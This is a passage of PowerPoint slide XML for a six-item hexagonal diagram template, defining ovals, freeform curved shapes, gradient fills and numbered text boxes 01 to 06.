              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>6-Item Hexagonal Diagram Slide Template</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Oval 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB5211CD-52F0-BBA0-E685-3CDD5D8D2BB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3942393" y="1637105"/>
            <a:ext cx="4300518" cy="4300508"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="rnd">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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C490B75F-CC3C-10F4-B350-B4254754C0B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036963" y="2736818"/>
            <a:ext cx="932827" cy="2101666"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1101283 w 1101283"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2481199"/>
              <a:gd name="connsiteX1" fmla="*/ 1101283 w 1101283"/>
              <a:gd name="connsiteY1" fmla="*/ 209739 h 2481199"/>
              <a:gd name="connsiteX2" fmla="*/ 1040142 w 1101283"/>
              <a:gd name="connsiteY2" fmla="*/ 219070 h 2481199"/>
              <a:gd name="connsiteX3" fmla="*/ 207572 w 1101283"/>
              <a:gd name="connsiteY3" fmla="*/ 1240599 h 2481199"/>
              <a:gd name="connsiteX4" fmla="*/ 1040142 w 1101283"/>
              <a:gd name="connsiteY4" fmla="*/ 2262128 h 2481199"/>
              <a:gd name="connsiteX5" fmla="*/ 1101283 w 1101283"/>
              <a:gd name="connsiteY5" fmla="*/ 2271460 h 2481199"/>
              <a:gd name="connsiteX6" fmla="*/ 1101283 w 1101283"/>
              <a:gd name="connsiteY6" fmla="*/ 2481199 h 2481199"/>
              <a:gd name="connsiteX7" fmla="*/ 998309 w 1101283"/>
              <a:gd name="connsiteY7" fmla="*/ 2465483 h 2481199"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1101283"/>
              <a:gd name="connsiteY8" fmla="*/ 1240599 h 2481199"/>
              <a:gd name="connsiteX9" fmla="*/ 998309 w 1101283"/>
              <a:gd name="connsiteY9" fmla="*/ 15715 h 2481199"/>
              <a:gd name="connsiteX10" fmla="*/ 1101283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1101283" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1101283" y="209739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1040142" y="219070"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="564995" y="316300"/>
                  <a:pt x="207572" y="736709"/>
                  <a:pt x="207572" y="1240599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="207572" y="1744489"/>
                  <a:pt x="564995" y="2164899"/>
                  <a:pt x="1040142" y="2262128"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1101283" y="2271460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101283" y="2481199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998309" y="2465483"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="428575" y="2348898"/>
                  <a:pt x="0" y="1844798"/>
                  <a:pt x="0" y="1240599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="636400"/>
                  <a:pt x="428575" y="132300"/>
                  <a:pt x="998309" y="15715"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11012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Freeform: Shape 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64771F16-24A0-1071-2298-8BC59D610384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6222211" y="2736818"/>
            <a:ext cx="932827" cy="2101666"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1101283"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2481199"/>
              <a:gd name="connsiteX1" fmla="*/ 102974 w 1101283"/>
              <a:gd name="connsiteY1" fmla="*/ 15715 h 2481199"/>
              <a:gd name="connsiteX2" fmla="*/ 1101283 w 1101283"/>
              <a:gd name="connsiteY2" fmla="*/ 1240599 h 2481199"/>
              <a:gd name="connsiteX3" fmla="*/ 102974 w 1101283"/>
              <a:gd name="connsiteY3" fmla="*/ 2465483 h 2481199"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1101283"/>
              <a:gd name="connsiteY4" fmla="*/ 2481199 h 2481199"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1101283"/>
              <a:gd name="connsiteY5" fmla="*/ 2271460 h 2481199"/>
              <a:gd name="connsiteX6" fmla="*/ 61141 w 1101283"/>
              <a:gd name="connsiteY6" fmla="*/ 2262128 h 2481199"/>
              <a:gd name="connsiteX7" fmla="*/ 893711 w 1101283"/>
              <a:gd name="connsiteY7" fmla="*/ 1240599 h 2481199"/>
              <a:gd name="connsiteX8" fmla="*/ 61141 w 1101283"/>
              <a:gd name="connsiteY8" fmla="*/ 219070 h 2481199"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1101283"/>
              <a:gd name="connsiteY9" fmla="*/ 209739 h 2481199"/>
              <a:gd name="connsiteX10" fmla="*/ 0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0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="102974" y="15715"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="672708" y="132300"/>
                  <a:pt x="1101283" y="636400"/>
                  <a:pt x="1101283" y="1240599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1101283" y="1844798"/>
                  <a:pt x="672708" y="2348898"/>
                  <a:pt x="102974" y="2465483"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="2481199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2271460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61141" y="2262128"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="536288" y="2164899"/>
                  <a:pt x="893711" y="1744489"/>
                  <a:pt x="893711" y="1240599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="893711" y="736709"/>
                  <a:pt x="536288" y="316300"/>
                  <a:pt x="61141" y="219070"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="20973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Oval 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF564999-4028-F127-73DE-1EC8EBD51862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4875212" y="2566865"/>
            <a:ext cx="2441576" cy="2441570"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="rnd">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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1672429F-A9ED-A522-346B-0AE23F09AB82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4948365" y="3030162"/>
            <a:ext cx="1917319" cy="1917315"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="61000"/>
            </a:schemeClr>
          </a:soli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Freeform: Shape 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3227B3-BD95-BE90-731E-9DFFB518A3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21262495">
            <a:off x="3844135" y="1496776"/>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98" name="Freeform: Shape 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0F4B44-DB6D-3FF2-3798-FED9FD0CAE96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985535" y="3178777"/>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99" name="Freeform: Shape 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7763E754-25C2-F945-410B-B474DBE6BD0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="480315">
            <a:off x="3777828" y="4806702"/>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0" name="Freeform: Shape 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE99ED09-8C77-EAA7-36C8-3C1B98229212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="337505" flipH="1">
            <a:off x="6281531" y="1496776"/>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1" name="Freeform: Shape 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD73BA4-33DF-DD2B-3F55-03276AA9BACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7153340" y="3178777"/>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03" name="Freeform: Shape 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365162F2-8055-3F26-179F-3459303B0242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21187948" flipH="1">
            <a:off x="6350352" y="4828879"/>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3" name="Oval 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4122EE06-83FE-D50E-3165-9B856BF15500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325458" y="3017108"/>
            <a:ext cx="1541087" cy="1541084"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2"/>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79BB03C8-CD81-A9D2-E5F5-0096AD8D0700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21262495">
            <a:off x="4407250" y="1568196"/>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14" name="Freeform: Shape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5B063F3-D88E-0583-8509-5F1DFD8692B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21262495">
            <a:off x="4323404" y="1471383"/>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D5946D2-1ABA-FD81-BC53-2C4A32F6F291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3548650" y="3250197"/>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64" name="Freeform: Shape 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3BE71FC-74D8-7733-52D1-AA7780ECC49E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3464804" y="3153384"/>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895DD4E-C180-8D91-45AF-F68C63B0F8A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="480315">
            <a:off x="4340943" y="4878122"/>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77" name="Freeform: Shape 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{990C9C7E-2A42-E821-4E57-32F48E0052E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="480315">
            <a:off x="4257097" y="4781309"/>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A55545A2-10A3-8F77-CB73-FC1B9183C931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="337505" flipH="1">
            <a:off x="6844646" y="1568196"/>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95" name="Freeform: Shape 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76240CB1-3538-F124-69D3-2809483F73FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="337505" flipH="1">
            <a:off x="6760800" y="1471383"/>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DF1F328D-70A3-44FC-BAEB-4D49E76A3533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7716455" y="3250197"/>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91" name="Freeform: Shape 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA11B2E4-C0AE-E277-3E18-F2BD0F442544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7632608" y="3153384"/>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4B5F704D-088A-4D4B-4E45-B3A3BECC51EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21187948" flipH="1">
            <a:off x="6913467" y="4900299"/>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bg1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst>
            <a:innerShdw blurRad="596900">
              <a:prstClr val="black">
                <a:alpha val="26000"/>
              </a:prstClr>
            </a:innerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Freeform: Shape 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB029F4F-AC24-9B3D-B7B0-0E2177749B86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21187948" flipH="1">
            <a:off x="6829621" y="4803486"/>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accent2"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9525" cap="flat">
            <a:no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B2843804-25DD-02D9-6A25-E6E15FD10119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046931" y="1851780"/>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01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="TextBox 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0643DADF-4A7D-FC97-9D2A-B6D820FEFB4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7921225" y="3568285"/>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02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="TextBox 105">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{105E72CE-ADFB-480D-3FC5-24C55CE8BDD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7119120" y="5196559"/>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03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="TextBox 106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E2F2B49-E7F3-E816-8C1C-747C4CF61D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4616552" y="1851780"/>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06</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="TextBox 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCA2734-0741-BD30-D460-B1F35F40AD43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3742257" y="3568285"/>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05</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="TextBox 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9749E8FD-228B-FA20-A9CF-56E850B4F645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4544362" y="5196559"/>
            <a:ext cx="518091" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Rectangle 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DCC6762-37B6-16F0-2134-95E16CA573A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8393965" y="1848418"/>
            <a:ext cx="2121395" cy="480537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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13" name="Rectangle 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72908926-F2EA-5E82-9816-9E38053E61F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8393965" y="1412776"/>
            <a:ext cx="2121395" cy="344414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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15" name="Rectangle 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C59E54A3-A09C-A20F-AA90-572C7D5F8E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676642" y="1848418"/>
            <a:ext cx="2121395" cy="480537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>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16" name="Rectangle 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62DB9DA3-AB8F-0687-7E87-19A73F8C0EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676642" y="1412776"/>
            <a:ext cx="2121395" cy="344414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>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18" name="Rectangle 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7396AD91-AEBE-6327-D0AF-60DE9D95671A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8393965" y="5470849"/>
            <a:ext cx="2121395" cy="480537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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19" name="Rectangle 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3CD6734-32F8-6D20-79DB-73A76A1903D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8393965" y="5035207"/>
            <a:ext cx="2121395" cy="344414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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21" name="Rectangle 120">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04710635-A86B-2747-4329-754E9E631E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676642" y="5470849"/>
            <a:ext cx="2121395" cy="480537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>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22" name="Rectangle 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726C1C3F-54A3-4634-602F-2EC71FBFF664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676642" y="5035207"/>
            <a:ext cx="2121395" cy="344414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>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24" name="Rectangle 123">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E074249-D0CE-0DD9-4953-51C1435C572F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
